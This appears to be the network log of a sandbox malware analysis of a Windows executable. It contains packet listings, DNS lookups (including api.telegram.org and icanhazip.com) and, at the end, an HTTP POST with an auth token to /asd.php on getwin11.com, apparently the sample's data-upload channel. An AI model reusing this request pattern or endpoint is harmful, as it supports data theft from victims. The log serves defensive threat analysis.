                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.691308022 CET44361331162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.707838058 CET61331443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.707918882 CET61331443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.769644022 CET61331443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.769984007 CET61331443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.803275108 CET44361331162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.866352081 CET44361331162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.879400015 CET61331443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.887464046 CET61331443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.887610912 CET61331443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.889730930 CET61331443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.889769077 CET61331443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.900906086 CET44361331162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.904278994 CET44361331162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.910872936 CET61331443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.982934952 CET44361331162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.982947111 CET44361331162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.984971046 CET44361331162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.993976116 CET6296953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.001343966 CET53629691.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.013055086 CET61331443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.168354988 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.169081926 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.170229912 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.170557022 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.191015005 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.191145897 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.268462896 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.269969940 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.270598888 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.271971941 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.272587061 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.273240089 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.273356915 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.274970055 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.275129080 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.292823076 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.292889118 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.301820993 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.302087069 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.302608013 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.302768946 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.327008963 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.352921963 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.372101068 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.372940063 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.373101950 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.374238014 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.374619961 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.389666080 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.422451973 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.893208027 CET61331443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.893371105 CET61331443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.990344048 CET44361331162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.991292953 CET44361331162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.991658926 CET44361331162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.994012117 CET61331443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:27.126374006 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:27.126656055 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:27.224169970 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:27.225636005 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:27.225778103 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:27.226097107 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:38.717159033 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:38.717284918 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:38.814341068 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:38.826375961 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:38.826416016 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:38.826829910 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:40.032429934 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:40.033499956 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:40.033771038 CET61331443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:40.035484076 CET61331443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:40.128657103 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:40.129378080 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:40.129817963 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:40.130012989 CET44361331162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:40.130022049 CET44349476172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:40.130623102 CET44361331162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:40.130666018 CET49476443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:40.131335020 CET44361331162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:40.132049084 CET44361331162.159.61.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:40.132297039 CET61331443192.168.2.4162.159.61.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.251048088 CET50571443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.251199961 CET50571443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.251384020 CET50571443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.251611948 CET50571443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.593523979 CET50571443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.706870079 CET44350571172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.707787037 CET50571443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.733846903 CET50571443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.800818920 CET44350571172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.800848007 CET44350571172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.800857067 CET44350571172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.800867081 CET44350571172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.801393032 CET50571443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.801455021 CET50571443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.805212021 CET44350571172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.843184948 CET50571443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.899014950 CET44350571172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.899305105 CET50571443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.997781992 CET44350571172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.998250961 CET44350571172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.998354912 CET44350571172.64.41.3192.168.2.4
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.998610973 CET50571443192.168.2.4172.64.41.3
                                                                                                                                                                                                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:22.827828884 CET192.168.2.41.1.1.1c29f(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:05.935612917 CET192.168.2.41.1.1.10x3ca6Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.404144049 CET192.168.2.41.1.1.10xd6c0Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.404311895 CET192.168.2.41.1.1.10x4e51Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:12.397380114 CET192.168.2.41.1.1.10xfd75Standard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:12.397528887 CET192.168.2.41.1.1.10x4f1aStandard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:13.389106989 CET192.168.2.41.1.1.10x6c80Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:13.389250994 CET192.168.2.41.1.1.10xa1c3Standard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:18.243515968 CET192.168.2.41.1.1.10x5eddStandard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:18.243649960 CET192.168.2.41.1.1.10x2e59Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:19.595123053 CET192.168.2.41.1.1.10xd76fStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:19.595421076 CET192.168.2.41.1.1.10x61abStandard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.044961929 CET192.168.2.41.1.1.10x51bbStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.045134068 CET192.168.2.41.1.1.10xc246Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.531085014 CET192.168.2.41.1.1.10x94a1Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.531303883 CET192.168.2.41.1.1.10xddc4Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.535593987 CET192.168.2.41.1.1.10x15b6Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.535792112 CET192.168.2.41.1.1.10xc855Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.542751074 CET192.168.2.41.1.1.10x7127Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.543173075 CET192.168.2.41.1.1.10x29f3Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.553632975 CET192.168.2.41.1.1.10x524cStandard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.553782940 CET192.168.2.41.1.1.10xf98Standard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:23.100148916 CET192.168.2.41.1.1.10x1845Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:23.100491047 CET192.168.2.41.1.1.10x770Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:23.100820065 CET192.168.2.41.1.1.10xdecbStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:23.100975990 CET192.168.2.41.1.1.10xd6d9Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:23.148531914 CET192.168.2.41.1.1.10xb64Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:23.148736954 CET192.168.2.41.1.1.10xa0c8Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.476391077 CET192.168.2.41.1.1.10x4667Standard query (0)getwin11.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:25.993976116 CET192.168.2.41.1.1.10x95f9Standard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:05.942965984 CET1.1.1.1192.168.2.40x3ca6No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.410803080 CET1.1.1.1192.168.2.40x4e51No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:09.410893917 CET1.1.1.1192.168.2.40xd6c0No error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:12.404134035 CET1.1.1.1192.168.2.40x4f1aNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:12.404371977 CET1.1.1.1192.168.2.40xfd75No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:12.404371977 CET1.1.1.1192.168.2.40xfd75No error (0)plus.l.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:13.395771980 CET1.1.1.1192.168.2.40x6c80No error (0)play.google.com142.250.185.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:14.830996037 CET1.1.1.1192.168.2.40x8e95No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:14.830996037 CET1.1.1.1192.168.2.40x8e95No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:18.250441074 CET1.1.1.1192.168.2.40x5eddNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:18.250643015 CET1.1.1.1192.168.2.40x2e59No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:19.754425049 CET1.1.1.1192.168.2.40x61abNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:19.754755020 CET1.1.1.1192.168.2.40xd76fNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.051573038 CET1.1.1.1192.168.2.40x51bbNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.051573038 CET1.1.1.1192.168.2.40x51bbNo error (0)googlehosted.l.googleusercontent.com142.250.185.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.053788900 CET1.1.1.1192.168.2.40xc246No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.537692070 CET1.1.1.1192.168.2.40x94a1No error (0)sb.scorecardresearch.com18.244.18.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.537692070 CET1.1.1.1192.168.2.40x94a1No error (0)sb.scorecardresearch.com18.244.18.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.537692070 CET1.1.1.1192.168.2.40x94a1No error (0)sb.scorecardresearch.com18.244.18.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.537692070 CET1.1.1.1192.168.2.40x94a1No error (0)sb.scorecardresearch.com18.244.18.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.542493105 CET1.1.1.1192.168.2.40x15b6No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.542607069 CET1.1.1.1192.168.2.40xc855No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.549870014 CET1.1.1.1192.168.2.40x7127No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.550304890 CET1.1.1.1192.168.2.40x29f3No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.560317993 CET1.1.1.1192.168.2.40x524cNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:20.560971022 CET1.1.1.1192.168.2.40xf98No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:21.452392101 CET1.1.1.1192.168.2.40x64c8No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:21.452392101 CET1.1.1.1192.168.2.40x64c8No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:23.106827021 CET1.1.1.1192.168.2.40x1845No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:23.106827021 CET1.1.1.1192.168.2.40x1845No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:23.107472897 CET1.1.1.1192.168.2.40x770No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:23.107482910 CET1.1.1.1192.168.2.40xdecbNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:23.107482910 CET1.1.1.1192.168.2.40xdecbNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:23.107552052 CET1.1.1.1192.168.2.40xd6d9No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:23.155394077 CET1.1.1.1192.168.2.40xa0c8No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:23.155534983 CET1.1.1.1192.168.2.40xb64No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:23.155534983 CET1.1.1.1192.168.2.40xb64No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.489833117 CET1.1.1.1192.168.2.40x4667No error (0)getwin11.com80.78.22.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.001343966 CET1.1.1.1192.168.2.40x95f9No error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:26.001343966 CET1.1.1.1192.168.2.40x95f9No error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:18.505652905 CET1.1.1.1192.168.2.40xee16No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:18.505652905 CET1.1.1.1192.168.2.40xee16No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:19.501444101 CET1.1.1.1192.168.2.40xee16No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:19.501444101 CET1.1.1.1192.168.2.40xee16No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:20.503079891 CET1.1.1.1192.168.2.40xee16No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:20.503079891 CET1.1.1.1192.168.2.40xee16No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.506238937 CET1.1.1.1192.168.2.40xee16No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:22.506238937 CET1.1.1.1192.168.2.40xee16No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:26.515134096 CET1.1.1.1192.168.2.40xee16No error (0)fg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 11:00:26.515134096 CET1.1.1.1192.168.2.40xee16No error (0)fg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                  • api.telegram.org
                                                                                                                                                                                                                                                                                                                  • www.google.com
                                                                                                                                                                                                                                                                                                                  • apis.google.com
                                                                                                                                                                                                                                                                                                                  • play.google.com
                                                                                                                                                                                                                                                                                                                  • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                                  • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                  • https:
                                                                                                                                                                                                                                                                                                                    • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                                    • browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                    • c.msn.com
                                                                                                                                                                                                                                                                                                                  • getwin11.com
                                                                                                                                                                                                                                                                                                                  • icanhazip.com
                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  0192.168.2.46088380.78.22.111807536C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  Jan 9, 2025 10:59:24.495744944 CET217OUTPOST /asd.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                  X-Auth-Token: v0id
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary="798e131b-5666-4510-adaa-0353ec848408"
                                                                                                                                                                                                                                                                                                                  Host: getwin11.com
                                                                                                                                                                                                                                                                                                                  Content-Length: 503
                                                                                                                                                                                                                                                                                                                  Expect: 100-continue
